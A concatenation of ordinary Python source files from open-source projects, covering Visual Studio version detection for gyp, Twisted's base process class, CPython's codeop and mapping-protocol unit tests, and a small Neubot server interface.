text = _RegistryQuery(key, value)
if not text:
return None
# Extract value.
match = re.search(r'REG_\w+\s+([^\r]+)\r\n', text)
if not match:
return None
return match.group(1)
def _CreateVersion(name, path, sdk_based=False):
"""Sets up MSVS project generation.
Setup is based on the GYP_MSVS_VERSION environment variable or whatever is
autodetected if GYP_MSVS_VERSION is not explicitly specified. If a version is
passed in that doesn't match a value in versions, Python will throw an error.
"""
if path:
path = os.path.normpath(path)
versions = {
'2015': VisualStudioVersion('2015',
'Visual Studio 2015',
solution_version='12.00',
project_version='14.0',
flat_sln=False,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v140'),
'2013': VisualStudioVersion('2013',
'Visual Studio 2013',
solution_version='13.00',
project_version='12.0',
flat_sln=False,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v120'),
'2013e': VisualStudioVersion('2013e',
'Visual Studio 2013',
solution_version='13.00',
project_version='12.0',
flat_sln=True,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v120'),
'2012': VisualStudioVersion('2012',
'Visual Studio 2012',
solution_version='12.00',
project_version='4.0',
flat_sln=False,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v110'),
'2012e': VisualStudioVersion('2012e',
'Visual Studio 2012',
solution_version='12.00',
project_version='4.0',
flat_sln=True,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v110'),
'2010': VisualStudioVersion('2010',
'Visual Studio 2010',
solution_version='11.00',
project_version='4.0',
flat_sln=False,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based),
'2010e': VisualStudioVersion('2010e',
'Visual C++ Express 2010',
solution_version='11.00',
project_version='4.0',
flat_sln=True,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based),
'2008': VisualStudioVersion('2008',
'Visual Studio 2008',
solution_version='10.00',
project_version='9.00',
flat_sln=False,
uses_vcxproj=False,
path=path,
sdk_based=sdk_based),
'2008e': VisualStudioVersion('2008e',
'Visual Studio 2008',
solution_version='10.00',
project_version='9.00',
flat_sln=True,
uses_vcxproj=False,
path=path,
sdk_based=sdk_based),
'2005': VisualStudioVersion('2005',
'Visual Studio 2005',
solution_version='9.00',
project_version='8.00',
flat_sln=False,
uses_vcxproj=False,
path=path,
sdk_based=sdk_based),
'2005e': VisualStudioVersion('2005e',
'Visual Studio 2005',
solution_version='9.00',
project_version='8.00',
flat_sln=True,
uses_vcxproj=False,
path=path,
sdk_based=sdk_based),
}
return versions[str(name)]
def _ConvertToCygpath(path):
"""Convert to cygwin path if we are using cygwin."""
if sys.platform == 'cygwin':
p = subprocess.Popen(['cygpath', path], stdout=subprocess.PIPE)
path = p.communicate()[0].strip()
return path
def _DetectVisualStudioVersions(versions_to_check, force_express):
"""Collect the list of installed visual studio versions.
Returns:
A list of visual studio versions installed in descending order of
usage preference.
Detection is based on the registry and a quick check whether devenv.exe exists.
Only versions 8 through 14 (2005 through 2015) are considered.
Possibilities are:
2005(e) - Visual Studio 2005 (8)
2008(e) - Visual Studio 2008 (9)
2010(e) - Visual Studio 2010 (10)
2012(e) - Visual Studio 2012 (11)
2013(e) - Visual Studio 2013 (12)
2015 - Visual Studio 2015 (14)
Where (e) is e for express editions of MSVS and blank otherwise.
"""
version_to_year = {
'8.0': '2005',
'9.0': '2008',
'10.0': '2010',
'11.0': '2012',
'12.0': '2013',
'14.0': '2015',
}
versions = []
for version in versions_to_check:
# Old method of searching for which VS version is installed
# We don't use the 2010-encouraged way because we also want to get the
# path to the binaries, which it doesn't offer.
keys = [r'HKLM\Software\Microsoft\VisualStudio\%s' % version,
r'HKLM\Software\Wow6432Node\Microsoft\VisualStudio\%s' % version,
r'HKLM\Software\Microsoft\VCExpress\%s' % version,
r'HKLM\Software\Wow6432Node\Microsoft\VCExpress\%s' % version]
for index in range(len(keys)):
path = _RegistryGetValue(keys[index], 'InstallDir')
if not path:
continue
path = _ConvertToCygpath(path)
# Check for full.
full_path = os.path.join(path, 'devenv.exe')
express_path = os.path.join(path, '*express.exe')
if not force_express and os.path.exists(full_path):
# Add this one.
versions.append(_CreateVersion(version_to_year[version],
os.path.join(path, '..', '..')))
# Check for express.
elif glob.glob(express_path):
# Add this one.
versions.append(_CreateVersion(version_to_year[version] + 'e',
os.path.join(path, '..', '..')))
# The old method above does not work when only SDK is installed.
keys = [r'HKLM\Software\Microsoft\VisualStudio\SxS\VC7',
r'HKLM\Software\Wow6432Node\Microsoft\VisualStudio\SxS\VC7']
for index in range(len(keys)):
path = _RegistryGetValue(keys[index], version)
if not path:
continue
path = _ConvertToCygpath(path)
if version != '14.0': # There is no Express edition for 2015.
versions.append(_CreateVersion(version_to_year[version] + 'e',
os.path.join(path, '..'), sdk_based=True))
return versions
def SelectVisualStudioVersion(version='auto', allow_fallback=True):
"""Select which version of Visual Studio projects to generate.
Arguments:
version: Hook to allow caller to force a particular version (vs auto).
allow_fallback: Whether a default version may be returned if none of the
requested versions is installed.
Returns:
An object representing a visual studio project format version.
"""
# In auto mode, check environment variable for override.
if version == 'auto':
version = os.environ.get('GYP_MSVS_VERSION', 'auto')
version_map = {
'auto': ('14.0', '12.0', '10.0', '9.0', '8.0', '11.0'),
'2005': ('8.0',),
'2005e': ('8.0',),
'2008': ('9.0',),
'2008e': ('9.0',),
'2010': ('10.0',),
'2010e': ('10.0',),
'2012': ('11.0',),
'2012e': ('11.0',),
'2013': ('12.0',),
'2013e': ('12.0',),
'2015': ('14.0',),
}
override_path = os.environ.get('GYP_MSVS_OVERRIDE_PATH')
if override_path:
msvs_version = os.environ.get('GYP_MSVS_VERSION')
if not msvs_version:
raise ValueError('GYP_MSVS_OVERRIDE_PATH requires GYP_MSVS_VERSION to be '
'set to a particular version (e.g. 2010e).')
return _CreateVersion(msvs_version, override_path, sdk_based=True)
version = str(version)
versions = _DetectVisualStudioVersions(version_map[version], 'e' in version)
if not versions:
if not allow_fallback:
raise ValueError('Could not locate Visual Studio installation.')
if version == 'auto':
# Default to 2005 if we couldn't find anything
return _CreateVersion('2005', None)
else:
return _CreateVersion(version, None)
return versions[0]
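# A minimal sketch (hypothetical, not part of gyp) of a typical call site:
# 'auto' lets GYP_MSVS_VERSION override detection. The short_name attribute
# is an assumption about VisualStudioVersion, whose definition lies above
# this excerpt, hence the getattr guard.
def _DemoSelectVersion():
  version = SelectVisualStudioVersion('auto')
  return getattr(version, 'short_name', version)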
|
ecolitan/fatics
|
refs/heads/master
|
venv/lib/python2.7/site-packages/twisted/internet/_baseprocess.py
|
38
|
# -*- test-case-name: twisted.test.test_process -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Cross-platform process-related functionality used by different
L{IReactorProcess} implementations.
"""
from twisted.python.reflect import qual
from twisted.python.deprecate import getWarningMethod
from twisted.python.failure import Failure
from twisted.python.log import err
from twisted.persisted.styles import Ephemeral
_missingProcessExited = ("Since Twisted 8.2, IProcessProtocol.processExited "
"is required. %s must implement it.")
class BaseProcess(Ephemeral):
pid = None
status = None
lostProcess = 0
proto = None
def __init__(self, protocol):
self.proto = protocol
def _callProcessExited(self, reason):
default = object()
processExited = getattr(self.proto, 'processExited', default)
if processExited is default:
getWarningMethod()(
_missingProcessExited % (qual(self.proto.__class__),),
DeprecationWarning, stacklevel=0)
else:
processExited(Failure(reason))
def processEnded(self, status):
"""
This is called when the child terminates.
"""
self.status = status
self.lostProcess += 1
self.pid = None
self._callProcessExited(self._getReason(status))
self.maybeCallProcessEnded()
def maybeCallProcessEnded(self):
"""
Call processEnded on protocol after final cleanup.
"""
if self.proto is not None:
reason = self._getReason(self.status)
proto = self.proto
self.proto = None
try:
proto.processEnded(Failure(reason))
except:
err(None, "unexpected error in processEnded")
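# A minimal sketch (hypothetical subclass, not part of Twisted): a concrete
# process supplies _getReason(); BaseProcess then drives processExited()
# and processEnded() on the protocol as shown above.
class _DemoProcess(BaseProcess):
    def _getReason(self, status):
        # Assume a clean exit maps to ProcessDone, as real reactors do.
        from twisted.internet.error import ProcessDone
        return ProcessDone(status)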
|
wskplho/sl4a
|
refs/heads/master
|
python/src/Lib/test/test_codeop.py
|
84
|
"""
Test cases for codeop.py
Nick Mathewson
"""
import unittest
from test.test_support import run_unittest, is_jython
from codeop import compile_command, PyCF_DONT_IMPLY_DEDENT
if is_jython:
import sys
import cStringIO
def unify_callables(d):
for n,v in d.items():
if callable(v):
d[n] = callable
return d
class CodeopTests(unittest.TestCase):
def assertValid(self, str, symbol='single'):
'''succeed iff str is a valid piece of code'''
if is_jython:
code = compile_command(str, "<input>", symbol)
self.assert_(code)
if symbol == "single":
d,r = {},{}
saved_stdout = sys.stdout
sys.stdout = cStringIO.StringIO()
try:
exec code in d
exec compile(str,"<input>","single") in r
finally:
sys.stdout = saved_stdout
elif symbol == 'eval':
ctx = {'a': 2}
d = { 'value': eval(code,ctx) }
r = { 'value': eval(str,ctx) }
self.assertEquals(unify_callables(r),unify_callables(d))
else:
expected = compile(str, "<input>", symbol, PyCF_DONT_IMPLY_DEDENT)
self.assertEquals( compile_command(str, "<input>", symbol), expected)
def assertIncomplete(self, str, symbol='single'):
'''succeed iff str is the start of a valid piece of code'''
self.assertEquals( compile_command(str, symbol=symbol), None)
def assertInvalid(self, str, symbol='single', is_syntax=1):
'''succeed iff str is the start of an invalid piece of code'''
try:
compile_command(str,symbol=symbol)
self.fail("No exception thrown for invalid code")
except SyntaxError:
self.assert_(is_syntax)
except OverflowError:
self.assert_(not is_syntax)
def test_valid(self):
av = self.assertValid
# special case
if not is_jython:
self.assertEquals(compile_command(""),
compile("pass", "<input>", 'single',
PyCF_DONT_IMPLY_DEDENT))
self.assertEquals(compile_command("\n"),
compile("pass", "<input>", 'single',
PyCF_DONT_IMPLY_DEDENT))
else:
av("")
av("\n")
av("a = 1")
av("\na = 1")
av("a = 1\n")
av("a = 1\n\n")
av("\n\na = 1\n\n")
av("def x():\n pass\n")
av("if 1:\n pass\n")
av("\n\nif 1: pass\n")
av("\n\nif 1: pass\n\n")
av("def x():\n\n pass\n")
av("def x():\n pass\n \n")
av("def x():\n pass\n \n")
av("pass\n")
av("3**3\n")
av("if 9==3:\n pass\nelse:\n pass\n")
av("if 1:\n pass\n if 1:\n pass\n else:\n pass\n")
av("#a\n#b\na = 3\n")
av("#a\n\n \na=3\n")
av("a=3\n\n")
av("a = 9+ \\\n3")
av("3**3","eval")
av("(lambda z: \n z**3)","eval")
av("9+ \\\n3","eval")
av("9+ \\\n3\n","eval")
av("\n\na**3","eval")
av("\n \na**3","eval")
av("#a\n#b\na**3","eval")
def test_incomplete(self):
ai = self.assertIncomplete
ai("(a **")
ai("(a,b,")
ai("(a,b,(")
ai("(a,b,(")
ai("a = (")
ai("a = {")
ai("b + {")
ai("if 9==3:\n pass\nelse:")
ai("if 9==3:\n pass\nelse:\n")
ai("if 9==3:\n pass\nelse:\n pass")
ai("if 1:")
ai("if 1:\n")
ai("if 1:\n pass\n if 1:\n pass\n else:")
ai("if 1:\n pass\n if 1:\n pass\n else:\n")
ai("if 1:\n pass\n if 1:\n pass\n else:\n pass")
ai("def x():")
ai("def x():\n")
ai("def x():\n\n")
ai("def x():\n pass")
ai("def x():\n pass\n ")
ai("def x():\n pass\n ")
ai("\n\ndef x():\n pass")
ai("a = 9+ \\")
ai("a = 'a\\")
ai("a = '''xy")
ai("","eval")
ai("\n","eval")
ai("(","eval")
ai("(\n\n\n","eval")
ai("(9+","eval")
ai("9+ \\","eval")
ai("lambda z: \\","eval")
def test_invalid(self):
ai = self.assertInvalid
ai("a b")
ai("a @")
ai("a b @")
ai("a ** @")
ai("a = ")
ai("a = 9 +")
ai("def x():\n\npass\n")
ai("\n\n if 1: pass\n\npass")
ai("a = 9+ \\\n")
ai("a = 'a\\ ")
ai("a = 'a\\\n")
ai("a = 1","eval")
ai("a = (","eval")
ai("]","eval")
ai("())","eval")
ai("[}","eval")
ai("9+","eval")
ai("lambda z:","eval")
ai("a b","eval")
def test_filename(self):
self.assertEquals(compile_command("a = 1\n", "abc").co_filename,
compile("a = 1\n", "abc", 'single').co_filename)
self.assertNotEquals(compile_command("a = 1\n", "abc").co_filename,
compile("a = 1\n", "def", 'single').co_filename)
def test_main():
run_unittest(CodeopTests)
if __name__ == "__main__":
test_main()
|
wskplho/sl4a
|
refs/heads/master
|
python/src/Lib/test/mapping_tests.py
|
56
|
# tests common to dict and UserDict
import unittest
import UserDict
class BasicTestMappingProtocol(unittest.TestCase):
# This base class can be used to check that an object conforms to the
# mapping protocol
# Functions that can be useful to override to adapt to dictionary
# semantics
type2test = None # which class is being tested (override in subclasses)
def _reference(self):
"""Return a dictionary of values which are invariant by storage
in the object under test."""
return {1:2, "key1":"value1", "key2":(1,2,3)}
def _empty_mapping(self):
"""Return an empty mapping object"""
return self.type2test()
def _full_mapping(self, data):
"""Return a mapping object with the value contained in data
dictionary"""
x = self._empty_mapping()
for key, value in data.items():
x[key] = value
return x
def __init__(self, *args, **kw):
unittest.TestCase.__init__(self, *args, **kw)
self.reference = self._reference().copy()
# A (key, value) pair not in the mapping
key, value = self.reference.popitem()
self.other = {key:value}
# A (key, value) pair in the mapping
key, value = self.reference.popitem()
self.inmapping = {key:value}
self.reference[key] = value
def test_read(self):
# Test for read only operations on mapping
p = self._empty_mapping()
p1 = dict(p) #workaround for singleton objects
d = self._full_mapping(self.reference)
if d is p:
p = p1
#Indexing
for key, value in self.reference.items():
self.assertEqual(d[key], value)
knownkey = self.other.keys()[0]
self.failUnlessRaises(KeyError, lambda:d[knownkey])
#len
self.assertEqual(len(p), 0)
self.assertEqual(len(d), len(self.reference))
#has_key
for k in self.reference:
self.assert_(d.has_key(k))
self.assert_(k in d)
for k in self.other:
self.failIf(d.has_key(k))
self.failIf(k in d)
#cmp
self.assertEqual(cmp(p,p), 0)
self.assertEqual(cmp(d,d), 0)
self.assertEqual(cmp(p,d), -1)
self.assertEqual(cmp(d,p), 1)
#__non__zero__
if p: self.fail("Empty mapping must compare to False")
if not d: self.fail("Full mapping must compare to True")
# keys(), items(), iterkeys() ...
def check_iterandlist(iter, lst, ref):
self.assert_(hasattr(iter, 'next'))
self.assert_(hasattr(iter, '__iter__'))
x = list(iter)
self.assert_(set(x)==set(lst)==set(ref))
check_iterandlist(d.iterkeys(), d.keys(), self.reference.keys())
check_iterandlist(iter(d), d.keys(), self.reference.keys())
check_iterandlist(d.itervalues(), d.values(), self.reference.values())
check_iterandlist(d.iteritems(), d.items(), self.reference.items())
#get
key, value = d.iteritems().next()
knownkey, knownvalue = self.other.iteritems().next()
self.assertEqual(d.get(key, knownvalue), value)
self.assertEqual(d.get(knownkey, knownvalue), knownvalue)
self.failIf(knownkey in d)
def test_write(self):
# Test for write operations on mapping
p = self._empty_mapping()
#Indexing
for key, value in self.reference.items():
p[key] = value
self.assertEqual(p[key], value)
for key in self.reference.keys():
del p[key]
self.failUnlessRaises(KeyError, lambda:p[key])
p = self._empty_mapping()
#update
p.update(self.reference)
self.assertEqual(dict(p), self.reference)
items = p.items()
p = self._empty_mapping()
p.update(items)
self.assertEqual(dict(p), self.reference)
d = self._full_mapping(self.reference)
#setdefault
key, value = d.iteritems().next()
knownkey, knownvalue = self.other.iteritems().next()
self.assertEqual(d.setdefault(key, knownvalue), value)
self.assertEqual(d[key], value)
self.assertEqual(d.setdefault(knownkey, knownvalue), knownvalue)
self.assertEqual(d[knownkey], knownvalue)
#pop
self.assertEqual(d.pop(knownkey), knownvalue)
self.failIf(knownkey in d)
self.assertRaises(KeyError, d.pop, knownkey)
default = 909
d[knownkey] = knownvalue
self.assertEqual(d.pop(knownkey, default), knownvalue)
self.failIf(knownkey in d)
self.assertEqual(d.pop(knownkey, default), default)
#popitem
key, value = d.popitem()
self.failIf(key in d)
self.assertEqual(value, self.reference[key])
p=self._empty_mapping()
self.assertRaises(KeyError, p.popitem)
def test_constructor(self):
self.assertEqual(self._empty_mapping(), self._empty_mapping())
def test_bool(self):
self.assert_(not self._empty_mapping())
self.assert_(self.reference)
self.assert_(bool(self._empty_mapping()) is False)
self.assert_(bool(self.reference) is True)
def test_keys(self):
d = self._empty_mapping()
self.assertEqual(d.keys(), [])
d = self.reference
self.assert_(self.inmapping.keys()[0] in d.keys())
self.assert_(self.other.keys()[0] not in d.keys())
self.assertRaises(TypeError, d.keys, None)
def test_values(self):
d = self._empty_mapping()
self.assertEqual(d.values(), [])
self.assertRaises(TypeError, d.values, None)
def test_items(self):
d = self._empty_mapping()
self.assertEqual(d.items(), [])
self.assertRaises(TypeError, d.items, None)
def test_len(self):
d = self._empty_mapping()
self.assertEqual(len(d), 0)
def test_getitem(self):
d = self.reference
self.assertEqual(d[self.inmapping.keys()[0]], self.inmapping.values()[0])
self.assertRaises(TypeError, d.__getitem__)
def test_update(self):
# mapping argument
d = self._empty_mapping()
d.update(self.other)
self.assertEqual(d.items(), self.other.items())
# No argument
d = self._empty_mapping()
d.update()
self.assertEqual(d, self._empty_mapping())
# item sequence
d = self._empty_mapping()
d.update(self.other.items())
self.assertEqual(d.items(), self.other.items())
# Iterator
d = self._empty_mapping()
d.update(self.other.iteritems())
self.assertEqual(d.items(), self.other.items())
# FIXME: Doesn't work with UserDict
# self.assertRaises((TypeError, AttributeError), d.update, None)
self.assertRaises((TypeError, AttributeError), d.update, 42)
outerself = self
class SimpleUserDict:
def __init__(self):
self.d = outerself.reference
def keys(self):
return self.d.keys()
def __getitem__(self, i):
return self.d[i]
d.clear()
d.update(SimpleUserDict())
i1 = d.items()
i2 = self.reference.items()
i1.sort()
i2.sort()
self.assertEqual(i1, i2)
class Exc(Exception): pass
d = self._empty_mapping()
class FailingUserDict:
def keys(self):
raise Exc
self.assertRaises(Exc, d.update, FailingUserDict())
d.clear()
class FailingUserDict:
def keys(self):
class BogonIter:
def __init__(self):
self.i = 1
def __iter__(self):
return self
def next(self):
if self.i:
self.i = 0
return 'a'
raise Exc
return BogonIter()
def __getitem__(self, key):
return key
self.assertRaises(Exc, d.update, FailingUserDict())
class FailingUserDict:
def keys(self):
class BogonIter:
def __init__(self):
self.i = ord('a')
def __iter__(self):
return self
def next(self):
if self.i <= ord('z'):
rtn = chr(self.i)
self.i += 1
return rtn
raise StopIteration
return BogonIter()
def __getitem__(self, key):
raise Exc
self.assertRaises(Exc, d.update, FailingUserDict())
d = self._empty_mapping()
class badseq(object):
def __iter__(self):
return self
def next(self):
raise Exc()
self.assertRaises(Exc, d.update, badseq())
self.assertRaises(ValueError, d.update, [(1, 2, 3)])
# no test_fromkeys or test_copy as both os.environ and shelves don't support it
def test_get(self):
d = self._empty_mapping()
self.assert_(d.get(self.other.keys()[0]) is None)
self.assertEqual(d.get(self.other.keys()[0], 3), 3)
d = self.reference
self.assert_(d.get(self.other.keys()[0]) is None)
self.assertEqual(d.get(self.other.keys()[0], 3), 3)
self.assertEqual(d.get(self.inmapping.keys()[0]), self.inmapping.values()[0])
self.assertEqual(d.get(self.inmapping.keys()[0], 3), self.inmapping.values()[0])
self.assertRaises(TypeError, d.get)
self.assertRaises(TypeError, d.get, None, None, None)
def test_setdefault(self):
d = self._empty_mapping()
self.assertRaises(TypeError, d.setdefault)
def test_popitem(self):
d = self._empty_mapping()
self.assertRaises(KeyError, d.popitem)
self.assertRaises(TypeError, d.popitem, 42)
def test_pop(self):
d = self._empty_mapping()
k, v = self.inmapping.items()[0]
d[k] = v
self.assertRaises(KeyError, d.pop, self.other.keys()[0])
self.assertEqual(d.pop(k), v)
self.assertEqual(len(d), 0)
self.assertRaises(KeyError, d.pop, k)
class TestMappingProtocol(BasicTestMappingProtocol):
def test_constructor(self):
BasicTestMappingProtocol.test_constructor(self)
self.assert_(self._empty_mapping() is not self._empty_mapping())
self.assertEqual(self.type2test(x=1, y=2), {"x": 1, "y": 2})
def test_bool(self):
BasicTestMappingProtocol.test_bool(self)
self.assert_(not self._empty_mapping())
self.assert_(self._full_mapping({"x": "y"}))
self.assert_(bool(self._empty_mapping()) is False)
self.assert_(bool(self._full_mapping({"x": "y"})) is True)
def test_keys(self):
BasicTestMappingProtocol.test_keys(self)
d = self._empty_mapping()
self.assertEqual(d.keys(), [])
d = self._full_mapping({'a': 1, 'b': 2})
k = d.keys()
self.assert_('a' in k)
self.assert_('b' in k)
self.assert_('c' not in k)
def test_values(self):
BasicTestMappingProtocol.test_values(self)
d = self._full_mapping({1:2})
self.assertEqual(d.values(), [2])
def test_items(self):
BasicTestMappingProtocol.test_items(self)
d = self._full_mapping({1:2})
self.assertEqual(d.items(), [(1, 2)])
def test_has_key(self):
d = self._empty_mapping()
self.assert_(not d.has_key('a'))
d = self._full_mapping({'a': 1, 'b': 2})
k = d.keys()
k.sort()
self.assertEqual(k, ['a', 'b'])
self.assertRaises(TypeError, d.has_key)
def test_contains(self):
d = self._empty_mapping()
self.assert_(not ('a' in d))
self.assert_('a' not in d)
d = self._full_mapping({'a': 1, 'b': 2})
self.assert_('a' in d)
self.assert_('b' in d)
self.assert_('c' not in d)
self.assertRaises(TypeError, d.__contains__)
def test_len(self):
BasicTestMappingProtocol.test_len(self)
d = self._full_mapping({'a': 1, 'b': 2})
self.assertEqual(len(d), 2)
def test_getitem(self):
BasicTestMappingProtocol.test_getitem(self)
d = self._full_mapping({'a': 1, 'b': 2})
self.assertEqual(d['a'], 1)
self.assertEqual(d['b'], 2)
d['c'] = 3
d['a'] = 4
self.assertEqual(d['c'], 3)
self.assertEqual(d['a'], 4)
del d['b']
self.assertEqual(d, {'a': 4, 'c': 3})
self.assertRaises(TypeError, d.__getitem__)
def test_clear(self):
d = self._full_mapping({1:1, 2:2, 3:3})
d.clear()
self.assertEqual(d, {})
self.assertRaises(TypeError, d.clear, None)
def test_update(self):
BasicTestMappingProtocol.test_update(self)
# mapping argument
d = self._empty_mapping()
d.update({1:100})
d.update({2:20})
d.update({1:1, 2:2, 3:3})
self.assertEqual(d, {1:1, 2:2, 3:3})
# no argument
d.update()
self.assertEqual(d, {1:1, 2:2, 3:3})
# keyword arguments
d = self._empty_mapping()
d.update(x=100)
d.update(y=20)
d.update(x=1, y=2, z=3)
self.assertEqual(d, {"x":1, "y":2, "z":3})
# item sequence
d = self._empty_mapping()
d.update([("x", 100), ("y", 20)])
self.assertEqual(d, {"x":100, "y":20})
# Both item sequence and keyword arguments
d = self._empty_mapping()
d.update([("x", 100), ("y", 20)], x=1, y=2)
self.assertEqual(d, {"x":1, "y":2})
# iterator
d = self._full_mapping({1:3, 2:4})
d.update(self._full_mapping({1:2, 3:4, 5:6}).iteritems())
self.assertEqual(d, {1:2, 2:4, 3:4, 5:6})
class SimpleUserDict:
def __init__(self):
self.d = {1:1, 2:2, 3:3}
def keys(self):
return self.d.keys()
def __getitem__(self, i):
return self.d[i]
d.clear()
d.update(SimpleUserDict())
self.assertEqual(d, {1:1, 2:2, 3:3})
def test_fromkeys(self):
self.assertEqual(self.type2test.fromkeys('abc'), {'a':None, 'b':None, 'c':None})
d = self._empty_mapping()
self.assert_(not(d.fromkeys('abc') is d))
self.assertEqual(d.fromkeys('abc'), {'a':None, 'b':None, 'c':None})
self.assertEqual(d.fromkeys((4,5),0), {4:0, 5:0})
self.assertEqual(d.fromkeys([]), {})
def g():
yield 1
self.assertEqual(d.fromkeys(g()), {1:None})
self.assertRaises(TypeError, {}.fromkeys, 3)
class dictlike(self.type2test): pass
self.assertEqual(dictlike.fromkeys('a'), {'a':None})
self.assertEqual(dictlike().fromkeys('a'), {'a':None})
self.assert_(dictlike.fromkeys('a').__class__ is dictlike)
self.assert_(dictlike().fromkeys('a').__class__ is dictlike)
# FIXME: the following won't work with UserDict, because it's an old style class
# self.assert_(type(dictlike.fromkeys('a')) is dictlike)
class mydict(self.type2test):
def __new__(cls):
return UserDict.UserDict()
ud = mydict.fromkeys('ab')
self.assertEqual(ud, {'a':None, 'b':None})
# FIXME: the following won't work with UserDict, because it's an old style class
# self.assert_(isinstance(ud, UserDict.UserDict))
self.assertRaises(TypeError, dict.fromkeys)
class Exc(Exception): pass
class baddict1(self.type2test):
def __init__(self):
raise Exc()
self.assertRaises(Exc, baddict1.fromkeys, [1])
class BadSeq(object):
def __iter__(self):
return self
def next(self):
raise Exc()
self.assertRaises(Exc, self.type2test.fromkeys, BadSeq())
class baddict2(self.type2test):
def __setitem__(self, key, value):
raise Exc()
self.assertRaises(Exc, baddict2.fromkeys, [1])
def test_copy(self):
d = self._full_mapping({1:1, 2:2, 3:3})
self.assertEqual(d.copy(), {1:1, 2:2, 3:3})
d = self._empty_mapping()
self.assertEqual(d.copy(), d)
self.assert_(isinstance(d.copy(), d.__class__))
self.assertRaises(TypeError, d.copy, None)
def test_get(self):
BasicTestMappingProtocol.test_get(self)
d = self._empty_mapping()
self.assert_(d.get('c') is None)
self.assertEqual(d.get('c', 3), 3)
d = self._full_mapping({'a' : 1, 'b' : 2})
self.assert_(d.get('c') is None)
self.assertEqual(d.get('c', 3), 3)
self.assertEqual(d.get('a'), 1)
self.assertEqual(d.get('a', 3), 1)
def test_setdefault(self):
BasicTestMappingProtocol.test_setdefault(self)
d = self._empty_mapping()
self.assert_(d.setdefault('key0') is None)
d.setdefault('key0', [])
self.assert_(d.setdefault('key0') is None)
d.setdefault('key', []).append(3)
self.assertEqual(d['key'][0], 3)
d.setdefault('key', []).append(4)
self.assertEqual(len(d['key']), 2)
def test_popitem(self):
BasicTestMappingProtocol.test_popitem(self)
for copymode in -1, +1:
# -1: b has same structure as a
# +1: b is a.copy()
for log2size in range(12):
size = 2**log2size
a = self._empty_mapping()
b = self._empty_mapping()
for i in range(size):
a[repr(i)] = i
if copymode < 0:
b[repr(i)] = i
if copymode > 0:
b = a.copy()
for i in range(size):
ka, va = ta = a.popitem()
self.assertEqual(va, int(ka))
kb, vb = tb = b.popitem()
self.assertEqual(vb, int(kb))
self.assert_(not(copymode < 0 and ta != tb))
self.assert_(not a)
self.assert_(not b)
def test_pop(self):
BasicTestMappingProtocol.test_pop(self)
# Tests for pop with specified key
d = self._empty_mapping()
k, v = 'abc', 'def'
# verify longs/ints get same value when key > 32 bits (for 64-bit archs)
# see SF bug #689659
x = 4503599627370496L
y = 4503599627370496
h = self._full_mapping({x: 'anything', y: 'something else'})
self.assertEqual(h[x], h[y])
self.assertEqual(d.pop(k, v), v)
d[k] = v
self.assertEqual(d.pop(k, 1), v)
class TestHashMappingProtocol(TestMappingProtocol):
def test_getitem(self):
TestMappingProtocol.test_getitem(self)
class Exc(Exception): pass
class BadEq(object):
def __eq__(self, other):
raise Exc()
def __hash__(self):
return 24
d = self._empty_mapping()
d[BadEq()] = 42
self.assertRaises(KeyError, d.__getitem__, 23)
class BadHash(object):
fail = False
def __hash__(self):
if self.fail:
raise Exc()
else:
return 42
d = self._empty_mapping()
x = BadHash()
d[x] = 42
x.fail = True
self.assertRaises(Exc, d.__getitem__, x)
def test_fromkeys(self):
TestMappingProtocol.test_fromkeys(self)
class mydict(self.type2test):
def __new__(cls):
return UserDict.UserDict()
ud = mydict.fromkeys('ab')
self.assertEqual(ud, {'a':None, 'b':None})
self.assert_(isinstance(ud, UserDict.UserDict))
def test_pop(self):
TestMappingProtocol.test_pop(self)
class Exc(Exception): pass
class BadHash(object):
fail = False
def __hash__(self):
if self.fail:
raise Exc()
else:
return 42
d = self._empty_mapping()
x = BadHash()
d[x] = 42
x.fail = True
self.assertRaises(Exc, d.pop, x)
def test_mutatingiteration(self):
d = self._empty_mapping()
d[1] = 1
try:
for i in d:
d[i+1] = 1
except RuntimeError:
pass
else:
self.fail("changing dict size during iteration doesn't raise Error")
def test_repr(self):
d = self._empty_mapping()
self.assertEqual(repr(d), '{}')
d[1] = 2
self.assertEqual(repr(d), '{1: 2}')
d = self._empty_mapping()
d[1] = d
self.assertEqual(repr(d), '{1: {...}}')
class Exc(Exception): pass
class BadRepr(object):
def __repr__(self):
raise Exc()
d = self._full_mapping({1: BadRepr()})
self.assertRaises(Exc, repr, d)
def test_le(self):
self.assert_(not (self._empty_mapping() < self._empty_mapping()))
self.assert_(not (self._full_mapping({1: 2}) < self._full_mapping({1L: 2L})))
class Exc(Exception): pass
class BadCmp(object):
def __eq__(self, other):
raise Exc()
def __hash__(self):
return 42
d1 = self._full_mapping({BadCmp(): 1})
d2 = self._full_mapping({1: 1})
try:
d1 < d2
except Exc:
pass
else:
self.fail("< didn't raise Exc")
def test_setdefault(self):
TestMappingProtocol.test_setdefault(self)
class Exc(Exception): pass
class BadHash(object):
fail = False
def __hash__(self):
if self.fail:
raise Exc()
else:
return 42
d = self._empty_mapping()
x = BadHash()
d[x] = 42
x.fail = True
self.assertRaises(Exc, d.setdefault, x, [])
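# A minimal sketch (hypothetical subclass, not part of this module): a
# concrete suite binds the class under test through type2test and inherits
# every check above.
class _DictMappingTest(TestHashMappingProtocol):
    type2test = dict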
|
bassosimone/neubot-server
|
refs/heads/master
|
neubot/negotiate_server_module.py
|
2
|
# neubot/negotiate/server.py
#
# Copyright (c) 2011 Simone Basso <bassosimone@gmail.com>,
# NEXA Center for Internet & Society at Politecnico di Torino
#
# This file is part of Neubot <http://www.neubot.org/>.
#
# Neubot is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Neubot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Neubot. If not, see <http://www.gnu.org/licenses/>.
#
''' Negotiate server '''
class NegotiateServerModule(object):
''' Each test should implement this interface '''
# The minimal collect echoes the request body
def collect(self, stream, request_body):
''' Invoked at the end of the test, to collect data '''
return request_body
# Only speedtest reimplements this method
